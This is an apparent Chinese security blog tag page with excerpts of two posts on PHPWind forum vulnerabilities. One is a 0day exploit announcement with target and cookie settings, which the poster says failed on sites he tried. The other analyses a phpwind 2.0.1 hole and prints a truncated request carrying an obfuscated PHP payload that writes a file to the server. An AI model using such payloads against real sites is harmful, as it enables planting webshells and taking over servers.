标签 ‘PHPWind’ 下的日志

phpwind 0day Exp

2006/11/10 5:29 | 鬼仔 | 工具收集 | 3 个回复

ps:我找了两个站测试了下,没成功。不知道是不是我测试有问题。

信息来源:Loveshell

请自行修改
$path="/search.php"; 这个不用改
$server='url.com'; 改成目标地址
$cookie=' 抓的cookies

喜欢的朋友可以做个GUI界面出来!
阅读全文 »

Tags: ,

分析phpwind2.0.1漏洞

2005/04/18 9:52 | 鬼仔 | 技术文章 | 消灭0回复

作者:allyesno 来源:http://blog.csdn.net/freexploit/

猫猫传给我一个phpwind2.0.1漏洞利用程序,可以直接在目录中写入一个木马。怎么说呢,这个漏洞是pinkeyes发现的,本文旨在分析这个漏洞的思路。直到发现这个漏洞是怎么产生的,我还在冒虚汗中,同时pinkeyes 的睿智深深的打动了我,原来我才明白什么才是真正的技术含量。且听我慢慢道来:
在程序运行时,我抓了一个包:

GET /phpwind/job.php?previewjob=preview&D_name=./attachment/set.php&tidwt=<?fputs(fopen
(chr(46).chr(47).chr(101).chr(114).chr(114).chr(111).chr(114).chr(46).chr(112).chr(104).chr(112),w),
阅读全文 »

Tags: